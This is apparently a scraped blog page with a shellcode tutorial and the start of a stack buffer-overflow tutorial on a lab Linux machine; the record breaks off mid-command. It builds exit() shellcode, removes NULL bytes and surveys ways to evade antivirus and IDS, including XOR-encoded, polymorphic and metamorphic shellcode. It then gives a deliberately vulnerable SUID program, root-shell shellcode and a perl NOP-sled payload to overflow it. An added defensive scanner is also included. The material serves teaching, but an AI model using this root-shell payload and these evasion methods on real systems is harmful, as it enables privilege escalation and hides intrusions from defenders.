[bodo@lethalcode testbed7]$ ./exit
[bodo@lethalcode testbed7]$ echo $?
0
[bodo@lethalcode testbed7]$
</pre>Another verification.<br /><br /><pre>
#include <stdlib.h>

int main()
{
    exit(1);
}

[bodo@lethalcode testbed7]$ gcc -g exit.c -o exit
[bodo@lethalcode testbed7]$ execstack -s exit
[bodo@lethalcode testbed7]$ ./exit
[bodo@lethalcode testbed7]$ echo $?
1
</pre>The first thing we need to know is the Linux system call number for exit(), which can be found in unistd.h. System calls are the services provided by the Linux kernel and, just like APIs in Windows, you call them with different arguments. C programs often use functions defined in libc, which provides wrappers for many system calls. Section 2 of the Linux manual pages provides more information about system calls; to get an overview, try "man 2" at the command shell. It is also possible to invoke the syscall() function directly. Each system call has a number defined in <syscall.h> or <unistd.h>. Internally, a system call is invoked by software interrupt 0x80 to transfer control to the kernel. 
The system call table is defined in the Linux kernel source file "arch/i386/kernel/entry.S".<br /><br />For our example we need just one system call, exit() (terminate the current process with an exit code). Its system call number is 1 and its argument is 0 (0 means the program exited normally, non-zero means it exited with an error). These are placed in the eax and ebx registers respectively. With this knowledge, let's create the program in assembly.<br /><br /> ######testshell.s#######<br /><br /> #assembly code for exit() system call, AT&T/Linux<br /><br /> <br /><br /> .section .data<br /><br /> .section .text<br /><br /> <br /><br /> .globl _start<br /><br /> <br /><br /> jmp dummy<br /><br /> <br /><br /> _start:<br /><br /> <br /><br /> popl %ebx #gets the "X" address<br /><br /> xor %eax, %eax #clear the eax register<br /><br /> mov %eax, 0x01(%ebx) #move NULL to the end of the "X"<br /><br /> mov $1, %eax #move 1 (exit syscall number) into %eax<br /><br /> mov $0, %ebx #move 0 (exit code) into %ebx<br /><br /> int $0x80 #interrupt 0x80<br /><br /> dummy:<br /><br /> call _start<br /><br /> .string "X"<br /><br />Then assemble and link this program, and disassemble the executable.<br /><br /> [bodo@lethalcode testbed7]$ as testshell.s -o testshell.o<br /><br /> [bodo@lethalcode testbed7]$ ld testshell.o -o testshell<br /><br /> [bodo@lethalcode testbed7]$ objdump -d testshell<br /><br /> <br /><br /> testshell: file format elf32-i386<br /><br /> <br /><br /> Disassembly of section .text:<br /><br /> <br /><br /> 08048074 <_start-0x2>:<br /><br /> 8048074: eb 12 jmp 8048088 <dummy><br /><br /> <br /><br /> 08048076 <_start>:<br /><br /> 8048076: 5b pop %ebx<br /><br /> 8048077: 31 c0 xor %eax, %eax<br /><br /> 8048079: 89 43 01 mov %eax, 0x1(%ebx)<br /><br /> 804807c: b8 01 00 00 00 mov $0x1, %eax<br /><br /> 8048081: bb 00 00 00 00 mov $0x0, %ebx<br /><br /> 8048086: cd 80 int $0x80<br /><br /> <br /><br /> 08048088 <dummy>:<br /><br /> 8048088: e8 e9 ff ff 
ff call 8048076 <_start><br /><br /> 804808d: 58 pop %eax<br /><br /> ...<br /><br /><br /><br />Extract the shellcode and rearrange the hex bytes in C character string format. Each group of hexadecimal values is the encoding of one of our assembly instructions, and with hexadecimal escapes we can put any byte value in the range 0-255 into the string, printable or not.<br /><br /> \xeb\x12\x5b\x31\xc0\x89\x43\x01\xb8\x01\x00\x00\x00\xbb\x00\x00\x00\x00\xcd<br /><br /> \x80\xe8\xe9\xff\xff\xff\x58<br /><br />Eliminating the NULL Bytes<br /><br /><br /><br />Unfortunately our shellcode contains NULL bytes, in the immediate operands. Placing a small value into a larger register is the most common mistake that produces NULL bytes in shellcode programming. In this example we move the 8-bit value $1 (one byte) into the 32-bit %eax register, so the immediate is encoded in four bytes and our shellcode gets three NULL bytes. It is better to always use the smallest register that can hold the value when moving a value in shellcode. These NULL bytes can easily be removed by using an 8-bit register instead of a 32-bit one. 
So replace %eax with %al and change the mov to movb.<br /><br /> ######testshell.s#######<br /><br /> #assembly code for exit() system call, AT&T/Linux<br /><br /> <br /><br /> .section .data<br /><br /> .section .text<br /><br /> <br /><br /> .globl _start<br /><br /> <br /><br /> jmp dummy<br /><br /> <br /><br /> _start:<br /><br /> <br /><br /> popl %ebx #gets the "X" address<br /><br /> xor %eax, %eax #clear the eax register<br /><br /> movb %al, 0x01(%ebx) #move NULL to the end of the "X"<br /><br /> movb $1, %al #move 1 into %al (low byte of %eax)<br /><br /> mov $0, %ebx #move 0 into %ebx<br /><br /> int $0x80 #interrupt 0x80<br /><br /> dummy:<br /><br /> call _start<br /><br /> .string "X"<br /><br />Again, assemble, link and disassemble it.<br /><br /> [bodo@lethalcode testbed7]$ as testshell.s -o testshell.o<br /><br /> [bodo@lethalcode testbed7]$ ld testshell.o -o testshell<br /><br /> [bodo@lethalcode testbed7]$ objdump -d testshell<br /><br /> <br /><br /> testshell: file format elf32-i386<br /><br /> <br /><br /> Disassembly of section .text:<br /><br /> <br /><br /> 08048074 <_start-0x2>:<br /><br /> 8048074: eb 0f jmp 8048085 <dummy><br /><br /> <br /><br /> 08048076 <_start>:<br /><br /> 8048076: 5b pop %ebx<br /><br /> 8048077: 31 c0 xor %eax, %eax<br /><br /> 8048079: 88 43 01 mov %al, 0x1(%ebx)<br /><br /> 804807c: b0 01 mov $0x1, %al<br /><br /> 804807e: bb 00 00 00 00 mov $0x0, %ebx<br /><br /> 8048083: cd 80 int $0x80<br /><br /> <br /><br /> 08048085 <dummy>:<br /><br /> 8048085: e8 ec ff ff ff call 8048076 <_start><br /><br /> 804808a: 58 pop %eax<br /><br /> ...<br /><br />Rearrange the shellcode.<br /><br /> \xeb\x0f\x5b\x31\xc0\x88\x43\x01\xb0\x01\xbb\x00\x00\x00\x00\xcd\x80\xe8\xec\xff\xff\xff\x58<br /><br />Well, we still have NULL bytes. They come from the immediate operand of the mov $0, %ebx instruction. 
When we want %ebx to hold the value 0 without putting a NULL byte into the instruction encoding, we can exclusive-OR the register with itself, as shown below:<br /><br /> xor %ebx, %ebx<br /><br />The result is a zeroed %ebx, but the instruction itself contains no NULL byte. Keep in mind that a zero value in a register and a NULL byte in the code are different things. Let's replace mov $0x0, %ebx with xor %ebx, %ebx.<br /><br /> ######testshell.s#######<br /><br /> #assembly code for exit() system call, AT&T/Linux<br /><br /> <br /><br /> .section .data<br /><br /> .section .text<br /><br /> <br /><br /> .globl _start<br /><br /> <br /><br /> jmp dummy<br /><br /> <br /><br /> _start:<br /><br /> <br /><br /> popl %ebx #gets the "X" address<br /><br /> xor %eax, %eax #clear the eax register<br /><br /> movb %al, 0x01(%ebx) #move NULL to the end of the "X"<br /><br /> movb $1, %al #move 1 into %al (low byte of %eax)<br /><br /> xor %ebx, %ebx #zero %ebx without a NULL byte<br /><br /> int $0x80 #interrupt 0x80<br /><br /> dummy:<br /><br /> call _start<br /><br /> .string "X"<br /><br />Reassemble and re-link, then disassemble the program.<br /><br /> [bodo@lethalcode testbed7]$ ld testshell.o -o testshell<br /><br /> [bodo@lethalcode testbed7]$ objdump -d testshell<br /><br /> <br /><br /> testshell: file format elf32-i386<br /><br /> <br /><br /> Disassembly of section .text:<br /><br /> <br /><br /> 08048074 <_start-0x2>:<br /><br /> 8048074: eb 0c jmp 8048082 <dummy><br /><br /> <br /><br /> 08048076 <_start>:<br /><br /> 8048076: 5b pop %ebx<br /><br /> 8048077: 31 c0 xor %eax, %eax<br /><br /> 8048079: 88 43 01 mov %al, 0x1(%ebx)<br /><br /> 804807c: b0 01 mov $0x1, %al<br /><br /> 804807e: 31 db xor %ebx, %ebx<br /><br /> 8048080: cd 80 int $0x80<br /><br /> <br /><br /> 08048082 <dummy>:<br /><br /> 8048082: e8 ef ff ff ff call 8048076 <_start><br /><br /> 8048087: 58 pop %eax<br /><br /> ...<br /><br />Rearrange the shellcode.<br /><br /> \xeb\x0c\x5b\x31\xc0\x88\x43\x01\xb0\x01\x31\xdb\xcd\x80\xe8\xef\xff\xff\xff\x58<br /><br />Now we don't have any NULL bytes anymore. 
So let's test our shellcode.<br /><br /> /*test.c*/<br /><br /> #include <unistd.h><br /><br /> <br /><br /> char testshcode[ ]="\xeb\x0c\x5b\x31\xc0\x88\x43\x01\xb0\x01\x31"<br /><br /> "\xdb\xcd\x80\xe8\xef\xff\xff\xff\x58";<br /><br /> <br /><br /> int main(int argc, char *argv[])<br /><br /> {<br /><br /> /*function pointer aimed at the shellcode buffer*/<br /><br /> int (*funct)();<br /><br /> funct = (int(*)())testshcode;<br /><br /> (int)(*funct)();<br /><br /> return 0;<br /><br /> }<br /><br />Compile and run the program.<br /><br /> [bodo@lethalcode testbed7]$ gcc -g test.c -o test<br /><br /> [bodo@lethalcode testbed7]$ execstack -s test<br /><br /> [bodo@lethalcode testbed7]$ ./test<br /><br /> [bodo@lethalcode testbed7]$ echo $?<br /><br /> 0<br /><br />Well, it works. For exit(1), change the following assembly instruction:<br /><br /> xor %ebx, %ebx<br /><br />to<br /><br /> movb $1, %bl<br /><br />Reassemble and re-link the assembly program, then disassemble it; only three bytes change. The following is the shellcode.<br /><br /> \xeb\x0c\x5b\x31\xc0\x88\x43\x01\xb0\x01\xb3\x01\xcd\x80\xe8\xef\xff\xff\xff\x58<br /><br />Then replace the shellcode in the test.c program, recompile and rerun it.<br /><br /> [bodo@lethalcode testbed7]$ gcc -g test.c -o test<br /><br /> [bodo@lethalcode testbed7]$ execstack -s test<br /><br /> [bodo@lethalcode testbed7]$ ./test<br /><br /> [bodo@lethalcode testbed7]$ echo $?<br /><br /> 1<br /><br />Well, we have verified that our shellcode works, and you can see that a shellcode is just a group of instructions that can be executed while another program is running.<br /><br />Fortunately, there are sites that provide ready-made shellcodes for various types of exploits and platforms, and there are programs that generate shellcode to suit your needs. So don't wear yourself out! 
Check out the links at the end of this Module.<br /><br /><br /><br />More Advanced Techniques<br /><br /><br /><br />In real situations a network has many detection and filtering modules or devices such as firewalls, anti-virus and IDS. Most basic shellcode constructs will fail when passing through these systems, but shellcode development has not stood still either. In this section we review some of the advanced techniques used in shellcode development to evade the normalization and signature-based security systems that the code encounters on its path to the target application, and to make the code stealthier. These techniques include:<br /><br /> Utilizing readily available system resources.<br /><br /> Alphanumeric shellcode.<br /><br /> Encrypting the shellcode.<br /><br /> Polymorphic shellcode.<br /><br /> Metamorphic shellcode.<br /><br /><br />Utilizing System Resources<br /><br /><br /><br />Exploits may make full use of the resources provided by the target in order to mimic normal application behavior. For example, an exploit may use the target's protocol support and extra features to disguise its payload, including encoding, compression and encryption. If the target supports transport compression, the payload may be compressed in the stream and decompressed by the server before the vulnerable condition is triggered. Examples include file format vulnerabilities and vulnerabilities in servers for media-based protocols. Many protocol server implementations offer encoding schemes to support data types that need more than the raw data. Simple authorization mechanisms that do not use encryption will most likely use simple encoding schemes such as Unicode (UTF) and Base64. 
If the target offers any form of encryption, the payload may use that channel instead of the clear-text transport and will most likely slip past the majority of IDS systems, as also happens with file format vulnerabilities. The most widely used variant may be the social engineering technique of sending an encrypted and compressed exploit as an email attachment, where the email itself looks perfectly legitimate.<br /><br /><br />Alphanumeric<br /><br /><br /><br />This method creates exploit code using only printable ASCII characters. In general, an alphanumeric code is a series of letters and numbers (hence the name) written in a form that a computer can understand and process; ASCII is one such code. More specifically, in exploit terminology alphanumeric code is machine code written so that it assembles into entirely readable ASCII characters such as "a"-"z", "A"-"Z", "1"-"9", "#", "!", "@" and so on. Doing this requires a very good understanding of the assembly language of the platform the code is intended for. Such code is used in shellcode with the intent of fooling applications, such as Web forms, into accepting the exploit code as valid, legal input.<br /><br /><br />Encryption<br /><br /><br /><br />In cryptography, encryption is the process of obscuring information to make it unreadable without specific knowledge of how to decrypt it. While encryption has been used to protect communications for centuries, for most of that time only organizations and individuals with an extraordinary need for secrecy made use of it. In the mid-1970s strong encryption emerged from the sole preserve of secretive government agencies into the public domain, and it is now used to protect widely used systems such as Internet e-commerce, mobile telephone networks and bank Automatic Teller Machine data communication. Nowadays the most common encryption protocols are SSL and SSH. 
Another consideration is protection against traffic analysis.<br /><br />In the exploit world, encryption is provided by an encoder; in its simplest form it eliminates NULLs and other user-defined characters from the shellcode. The most basic algorithm uses a simple XOR and includes a built-in decoder routine. It is usually possible to avoid NULL characters in the first place by using the right register size, as explained before, but that is not always enough once we consider other characters in standard character sets such as ASCII, EBCDIC and Unicode (and their variants). There may be a need to hide some characters, for example to avoid signature-based recognition. Finally, encoding the shellcode nicely obscures all the clear text in it.<br /><br /><br />Polymorphic<br /><br /><br /><br />In computer terminology, polymorphic code is code that mutates while keeping the original algorithm intact; it is self-modifying code. Historically, polymorphic code was invented in 1992 by the Bulgarian cracker Dark Avenger (a pseudonym) as a means of avoiding pattern recognition by antivirus software.<br /><br />This technique is sometimes used by computer viruses, shellcodes and computer worms to hide their presence. Most anti-virus software and intrusion detection systems attempt to locate malicious code by searching through files on a computer and packets sent over a network. If the security software finds patterns that correspond to known computer viruses, worms or exploit codes, it takes appropriate steps to neutralize the threat. Polymorphic algorithms make it difficult for such software to locate the offending code because it constantly mutates.<br /><br />Encryption is the most commonly used method of achieving polymorphism in code. However, not all of the code can be encrypted, as it would then be completely unusable. A small portion is left unencrypted and used to jump-start the encrypted part. 
Anti-virus software targets this small unencrypted portion of the code.<br /><br />Malicious programmers have sought to protect their polymorphic code from this strategy by rewriting the unencrypted decryption engine each time the virus or worm propagates. Anti-virus software in turn uses sophisticated pattern analysis to find underlying patterns within the different mutations of the decryption engine, in the hope of reliably detecting such malware. As an example, the ADMutate program was released by Ktwo. ADMutate is designed to defeat IDS signature checking by altering the appearance of buffer overflow exploits, a technique borrowed from virus writers. The mutation engine contains the following components:<br /><br /> NOPs are substituted with operationally inert instructions. For example, the Intel architecture has more than 50 NOP-equivalent instructions.<br /><br /> The shellcode is encoded by XORing it with a randomly generated key.<br /><br /> The return address is modulated: its least significant byte is altered to jump into different parts of the NOP area.<br /><br /><br /><br />And the decode engine:<br /><br /> It needs to decode the XORed shellcode.<br /><br /> The engine itself is also polymorphic: it varies the assembly instructions used to accomplish the same result in different ways, and decodes out of order to vary the signature even more.<br /><br /><br />Metamorphic code<br /><br /><br /><br />This is a more powerful and technically demanding level of polymorphism. In computer virus terms, metamorphic code is code that can reprogram itself. Often it does this by translating its own code into a temporary pseudo-code and then back into normal code again. Some viruses use this when they are about to infect new files, with the result that their "children" or "clones" never look like themselves. 
The computer viruses that use this technique do so to avoid the pattern recognition of anti-virus software: the actual algorithm does not change, but everything else might.<br /><br />Metamorphic code is more effective than polymorphic code, because most anti-virus software will try to search for known virus code even during its execution. Metamorphic code can also mean that a virus is capable of infecting executables of two or more different operating systems (such as Windows and Linux) or even different computer architectures. Often the virus does this by carrying several viruses with it, so it is really a matter of several viruses 'combined' into a "supervirus". Like polymorphic code, metamorphic code also uses an encoder and a decoder. Worms and viruses have used morphing engines for decades to evade signature-based anti-virus systems. The same techniques are used in exploit code to evade other simple signature-based security systems, such as Intrusion Detection Systems.</b></span></div>
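As an added example (not code from the original post), here is a small C analysis tool for two points made above: it counts the NULL bytes in shellcode given in the post's \xHH string format, showing the three versions of the exit() shellcode going from 7 to 4 to 0 NULL bytes, and it scans a buffer for the post's int 0x80 exit sequence under any single-byte XOR key, the detection-side inverse of the simple XOR encoder described under Encryption. The function names, the sample buffer and the key 0x5a are constructed here; only the shellcode bytes come from the post.

```c
/* Added example, not from the original post: (1) count the NULL bytes in a
 * shellcode written in the post's "\xHH" string format and (2) find the post's
 * exit() syscall sequence in a buffer even after single-byte XOR encoding.
 * Function names, the sample buffer and the key 0x5a are constructed here. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* The three exit() shellcode versions from the post, as the post prints them. */
const char *const EXIT_V1 =
    "\\xeb\\x12\\x5b\\x31\\xc0\\x89\\x43\\x01\\xb8\\x01\\x00\\x00\\x00"
    "\\xbb\\x00\\x00\\x00\\x00\\xcd\\x80\\xe8\\xe9\\xff\\xff\\xff\\x58";
const char *const EXIT_V2 =
    "\\xeb\\x0f\\x5b\\x31\\xc0\\x88\\x43\\x01\\xb0\\x01\\xbb\\x00\\x00"
    "\\x00\\x00\\xcd\\x80\\xe8\\xec\\xff\\xff\\xff\\x58";
const char *const EXIT_V3 =
    "\\xeb\\x0c\\x5b\\x31\\xc0\\x88\\x43\\x01\\xb0\\x01\\x31\\xdb\\xcd"
    "\\x80\\xe8\\xef\\xff\\xff\\xff\\x58";
/* movb $1,%al ; xor %ebx,%ebx ; int $0x80 : the syscall core of EXIT_V3. */
const unsigned char EXIT_MARKER[] = { 0xb0, 0x01, 0x31, 0xdb, 0xcd, 0x80 };

/* Parse "\xHH\xHH..." text into raw bytes. Returns the byte count, or -1 on
 * a malformed escape or when out (cap bytes) is too small. */
int parse_hex_escapes(const char *s, unsigned char *out, size_t cap)
{
    size_t n = 0;
    for (; *s != '\0'; s += 4) {
        char hex[3], *end;
        if (s[0] != '\\' || s[1] != 'x' || s[2] == '\0' || s[3] == '\0' || n >= cap)
            return -1;
        hex[0] = s[2]; hex[1] = s[3]; hex[2] = '\0';
        out[n++] = (unsigned char)strtoul(hex, &end, 16);
        if (*end != '\0')
            return -1;
    }
    return (int)n;
}

/* Number of 0x00 bytes in an escaped shellcode string, or -1 if unparsable.
 * A strcpy()-style copy stops at the first 0x00, which is why the post turns
 * mov $1,%eax into movb $1,%al and mov $0,%ebx into xor %ebx,%ebx. */
int null_byte_count(const char *escaped)
{
    unsigned char buf[256];
    int n = parse_hex_escapes(escaped, buf, sizeof buf), nulls = 0;
    for (int i = 0; i < n; i++)
        nulls += (buf[i] == 0x00);
    return n < 0 ? -1 : nulls;
}

/* Look for marker in buf under any single-byte XOR key (key 0 = not encoded).
 * The first marker byte fixes the only possible key at each offset, so one
 * pass suffices instead of 256. Returns the offset (key via key_out) or -1. */
long xor_scan(const unsigned char *buf, size_t n,
              const unsigned char *marker, size_t mlen, int *key_out)
{
    for (size_t off = 0; mlen > 0 && off + mlen <= n; off++) {
        int key = buf[off] ^ marker[0];
        size_t i = 1;
        while (i < mlen && (buf[off + i] ^ key) == marker[i])
            i++;
        if (i == mlen) {
            if (key_out != NULL)
                *key_out = key;
            return (long)off;
        }
    }
    return -1;
}

/* Constructed sample: harmless request text followed by EXIT_V3 XOR-encoded
 * with key 0x5a, as the simplest encoder would emit it. Returns the key the
 * scanner recovers (expected 0x5a) and stores the marker offset (expected 34),
 * or -1 if the marker is not found. */
int sample_scan(long *offset_out)
{
    static const char filler[] = "GET /index.html HTTP/1.0\r\n";
    unsigned char sample[128];
    size_t flen = sizeof filler - 1;
    int key = -1, clen = parse_hex_escapes(EXIT_V3, sample + flen, sizeof sample - flen);
    long off = -1;
    memcpy(sample, filler, flen);
    for (int i = 0; i < clen; i++)      /* clen < 0 leaves nothing to encode */
        sample[flen + i] ^= 0x5a;
    if (clen > 0)
        off = xor_scan(sample, flen + (size_t)clen, EXIT_MARKER, sizeof EXIT_MARKER, &key);
    if (offset_out != NULL)
        *offset_out = off;
    return off < 0 ? -1 : key;
}
long sample_scan_offset(void) { long off = -1; sample_scan(&off); return off; }

int main(void)
{
    printf("NULL bytes: v1=%d v2=%d v3=%d\n", null_byte_count(EXIT_V1),
           null_byte_count(EXIT_V2), null_byte_count(EXIT_V3));
    printf("sample: marker at offset %ld under XOR key 0x%02x\n",
           sample_scan_offset(), sample_scan(NULL));
    return 0;
}
```

Longer markers keep the scanner's false-positive rate low; a two-byte marker such as cd 80 alone would match random data under some key about once every 256 offsets.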
</div>
Indian4994http://www.blogger.com/profile/14173641514901570881noreply@blogger.com1tag:blogger.com,1999:blog-3299468824600484367.post-88814949936272533432011-09-30T23:30:00.000-07:002011-09-30T23:36:11.485-07:00Buffer over flow tutorial<div dir="ltr" style="text-align: left;" trbidi="on">
<div style="color: #666666; font-family: Arial,Helvetica,sans-serif;">
<span style="font-size: small;"><b>THE VULNERABLE AND THE EXPLOIT<br /><br /><br /><br />Warning: All the security settings for buffer overflow protection (non-executable stack and randomization of certain portions of the memory address space) on the test Linux Fedora machine used in this section have been disabled for the educational purpose of this demonstration. Do not do this on your production machines! OS: Fedora 3, 2.6.11.x kernel with several updates.<br /></b></span><br /><span style="font-size: small;"><b><br />With the knowledge that we have supposedly acquired, let's test a stack-based buffer overflow in a real vulnerable program.<br /><br /><br /><br />SOME BACKGROUND STORY OF THE SUID<br /><br /><br /><br />In certain circumstances, unprivileged users must be able to accomplish tasks that require privileges. An example is the passwd program, which allows a normal user to change their password. Changing a user's password requires modifying the password field in the /usr/bin/passwd file. However, you should not give a user access to change this file directly, because the user could then change everybody else's password as well. To get around this problem, Linux/Unix allows programs to be endowed with privilege. Processes executing these programs can assume another UID (User Identifier) or GID (Group Identifier) while they are running. A program that changes its UID is called a SUID program (set-UID); a program that changes its GID is called a SGID program (set-GID). A program can be both SUID and SGID at the same time. In Windows the closest equivalent is RunAs. When a SUID program is run, its effective UID becomes that of the owner of the file rather than that of the user who runs it.<br /><br /><br />THE POSSIBLE PROBLEM<br /><br /><br /><br />Any program can be SUID, SGID, or both SUID and SGID. 
Because this feature is so general, SUID/SGID can open up some interesting security problems. For example, any user can become the superuser simply by running a SUID copy of csh that is owned by root (you must be root to create a SUID version of csh). SUID and SGID executables, when run by a normal user, may have access to resources not normally available to the user running the program (note the owner of the file versus the user running it). For example:<br /><br /> [bodo@lethalcode /]$ls -l /home/bodo/testbed2/test<br /><br /> -rwsr-xr-x 1 root root 6312 Feb 15 23:11 /home/bodo/testbed2/test<br /><br /> [bodo@lethalcode /]$ls -l /sbin/netreport<br /><br /> -rwxr-sr-x 1 root root 10851 Nov 4 13:48 /sbin/netreport<br /><br /> [bodo@lethalcode /]$<br /><br />The s in the owner's and group's permission field, in place of the usual x in the listing above, indicates that the executable test program is SUID and netreport is SGID. If run by a normal user, the executable will run with the privileges of the owner/group of the file, in this case root. The program will then have access to the same system resources as root (limited only by what the program does). A cracker with a normal user account may use these SGID and SUID programs to gain root privilege. You can list all of the SUID and SGID files on your system with the following find command:<br /><br /> [root@lethalcode /]#find / -perm -004000 -o -perm -002000 -type f<br /><br />This find command starts in the root directory (/) and looks for all files that match mode 002000 (SGID) or mode 004000 (SUID). The -type f option causes the search to be restricted to files. (Note that find's -o binds more loosely than the implied -a, so written this way -type f applies only to the -perm -002000 branch; wrap the two -perm tests in \( ... \) if it should apply to both.) For the basic attack you can use root-owned, world-writable files and directories. These can be listed with the following find command:<br /><br /> [root@lethalcode /]#find / -user root -perm -022<br /><br />You can set or unset SUID or SGID privileges with the chmod command. 
For example:<br /><br /> chmod 4xxx file_name or chmod +s file_name - SUID<br /><br /> chmod 2xxx file_name - SGID<br /><br />EXAMPLE #1-EXPLOIT DEMONSTRATION<br /><br /><br /><br />In our exploit example we are going to overflow the stack of a SUID program. As a normal user we will spawn a local root shell by overflowing a program owned by root. The vulnerable program is shown below; it is installed SUID.<br /><br /> /* test.c */<br /><br /> #include <stdio.h> /* printf() */<br /><br /> #include <stdlib.h> /* exit() */<br /><br /> #include <string.h> /* strcpy() */<br /><br /> #include <unistd.h><br /><br /> <br /><br /> int main(int argc, char *argv[])<br /><br /> {<br /><br /> char buff[100];<br /><br /> /*if no argument…*/<br /><br /> if(argc <2)<br /><br /> {<br /><br /> printf("Syntax: %s <input string>\n", argv[0]);<br /><br /> exit (0);<br /><br /> }<br /><br /> /*no bounds check: an argv[1] longer than buff overflows the stack*/<br /><br /> strcpy(buff, argv[1]);<br /><br /> return 0;<br /><br /> }<br /><br />The shellcode used to spawn a root shell is as follows:<br /><br /> \x31\xc0\x89\xc3\xb0\x17\xcd\x80\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89<br /><br /> \xe3\x52\x53\x89\xe1\x8d\x42\x0b\xcd\x80<br /><br />In our vulnerable program we declared an array buff[100] of size 100 and fill it with strcpy(), a function that does no bounds checking of its input. We are going to overflow this program's stack by supplying more than 100 characters, until the return address is overwritten with an address pointing back into the stack, where we have stored our ‘root spawning’ shellcode. By simple observation and calculation, the stack frame for this program should be as follows:<br /><br /><br /><br />Figure 1: Spawning a root shell exploit - a stack layout.<br /><br /><br /><br />Let's run the program with some sample inputs. 
Firstly, compile the test.c, change the owner and group to root and suid the program then change back to normal user, so that we as normal user can run the program that owned by root.<br /><br /> [bodo@lethalcode testbed2]$ gcc -g test.c -o test<br /><br /> [bodo@lethalcode testbed2]$ ls -l<br /><br /> total 20<br /><br /> -rwxrwxr-x 1 bodo bodo 6312 Feb 25 23:18 test<br /><br /> -rwxr-xr-x 1 root root 219 Feb 15 22:38 test.c<br /><br /> [bodo@lethalcode testbed2]$ su<br /><br /> Password: *****<br /><br /> [root@lethalcode testbed2]# chown 0:0 test<br /><br /> [root@lethalcode testbed2]# ls -l<br /><br /> total 20<br /><br /> -rwxrwxr-x 1 root root 6312 Feb 25 23:18 test<br /><br /> -rwxr-xr-x 1 root root 219 Feb 15 22:38 test.c<br /><br /> [root@lethalcode testbed2]# chmod 4755 test<br /><br /> [root@lethalcode testbed2]# ls -l<br /><br /> total 20<br /><br /> -rwsr-xr-x 1 root root 6312 Feb 25 23:18 test<br /><br /> -rwxr-xr-x 1 root root 219 Feb 15 22:38 test.c<br /><br /> [root@lethalcode testbed2]# exit<br /><br /> exit<br /><br /> [bodo@lethalcode testbed2]$<br /><br />From the previous stack layout, in order to overwrite the return address we need to supply 108 characters or at least 104 to start the overwriting. 
Let's verify this by running the program with some sample inputs.<br /><br /> [bodo@lethalcode testbed2]$ ls -l<br /><br /> total 20<br /><br /> -rwsr-xr-x 1 root root 6312 Feb 15 23:11 test<br /><br /> -rwxr-xr-x 1 root root 219 Feb 15 22:38 test.c<br /><br /> <br /><br /> [bodo@lethalcode testbed2]$ ls -F -l<br /><br /> total 20<br /><br /> -rwsr-xr-x 1 root root 6312 Feb 25 23:18 test*<br /><br /> -rwxr-xr-x 1 root root 219 Feb 15 22:38 test.c*<br /><br /> [bodo@lethalcode testbed2]$ ./test `perl -e 'print "A"x100'`<br /><br /> [bodo@lethalcode testbed2]$ ./test `perl -e 'print "A"x104'`<br /><br /> [bodo@lethalcode testbed2]$ ./test `perl -e 'print "A"x108'`<br /><br /> [bodo@lethalcode testbed2]$ ./test `perl -e 'print "A"x116'`<br /><br /> [bodo@lethalcode testbed2]$ ./test `perl -e 'print "A"x120'`<br /><br /> [bodo@lethalcode testbed2]$ ./test `perl -e 'print "A"x124'`<br /><br /> Segmentation fault<br /><br /> [bodo@lethalcode testbed2]$<br /><br />Well, we need at least 124 bytes instead of 104. So what happened here? Let's examine the program using gdb.<br /><br /> [bodo@lethalcode testbed2]$ gdb -q test<br /><br /> Using host libthread_db library "/lib/tls/libthread_db.so.1".<br /><br /> (gdb) disass main<br /><br /> Dump of assembler code for function main:<br /><br /> 0x080483d0 <main+0>: push %ebp<br /><br /> 0x080483d1 <main+1>: mov %esp, %ebp<br /><br /> 0x080483d3 <main+3>: sub $0x78, %esp<br /><br /> 0x080483d6 <main+6>: and $0xfffffff0, %esp<br /><br /> 0x080483d9 <main+9>: mov $0x0, %eax<br /><br /> ...<br /><br /> [Trimmed]<br /><br /> ...<br /><br /> 0x08048425 <main+85>: add $0x10, %esp<br /><br /> 0x08048428 <main+88>: mov $0x0, %eax<br /><br /> 0x0804842d <main+93>: leave<br /><br /> 0x0804842e <main+94>: ret<br /><br /> ---Type <return> to continue, or q <return> to quit---<br /><br /> End of assembler dump.<br /><br /> (gdb) <br /><br />By disassembling main(), we can see that 120 (0x78) bytes have been reserved instead of 100. 
There are some changes here: since gcc 2.96 the stack is aligned to 16 bytes, so when main() is called the space for its local variables is padded to a multiple of 16 bytes. Newer versions of gcc may behave differently again, so it is better to verify this with gdb yourself. You can also test it by running the following program: change n to different values and check the buffer reserved on the stack with gdb.<br /><br /> /****testbuf.c******/<br /><br /> #include <string.h> /* strcpy() */<br /><br /> <br /><br /> int main(int argc, char *argv[])<br /><br /> {<br /><br /> char buffer[n]; /* replace n with the size to test */<br /><br /> strcpy(buffer, argv[1]);<br /><br /> return 0;<br /><br /> }<br /><br />Back to our program, the stack should now look like this:<br /><br /><br /><br />Figure 2: Spawning a root shell exploit - stack's content arrangement.<br /><br /><br /><br />So we need at least 124 bytes to start overwriting the saved ebp and 128 bytes to overwrite the return address. Our stack arrangement should be something like the following:<br /><br /> NOPs (72 bytes) + Shellcode (32 bytes) + ‘A’ characters (20 bytes) + Return address (4 bytes-pointing back to the NOPs area) = 72 + 32 + 20 + 4 = 128 bytes<br /><br />Using perl's print command for convenience, our input/argument arrangement is as follows. This is a one-line command.<br /><br /> `perl -e 'print "\x90"x72, "\x31\xc0\x89\xc3\xb0\x17\xcd\x80\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62<br /><br /> \x69\x89\xe3\x52\x53\x89\xe1\x8d\x42\x0b\xcd\x80", "a"x20, "\xa0\xfb\xff\xbf"'`<br /><br />To raise our chances of hitting the shellcode, we pad the beginning of the buffer with NOPs (the executable no-operation instruction, \x90 on x86). 
Though some guesswork may still be required, the return address no longer needs to be precise; it is enough to land anywhere in the NOP area. Now our stack layout should be something like the following:<br /><br /><br /><br />Figure 3: Spawning a root shell exploit - stack's content arrangement with NOPs and shellcodes.<br /><br /><br /><br />Other Intel x86 instructions that can be used in place of NOPs (because a run of NOPs is easily detected by an Intrusion Detection System, IDS) can be found at the following links: NOP equivalent instructions, or you can check the processor's instruction set documentation. Next, let's verify the return address of our program by running it in gdb with the sample input/argument constructed previously. <br /><br /> [bodo@lethalcode testbed2]$ gdb -q test<br /><br /> Using host libthread_db library "/lib/tls/libthread_db.so.1".<br /><br /> (gdb) break main<br /><br /> Breakpoint 1 at 0x80483ec: file test.c, line 7.<br /><br /> (gdb) r `perl -e 'print "\x90"x72, "\x31\xc0\x89\xc3\xb0\x17\xcd\x80\x31\xd2\x52\x68\x6e\x2f<br /><br /> 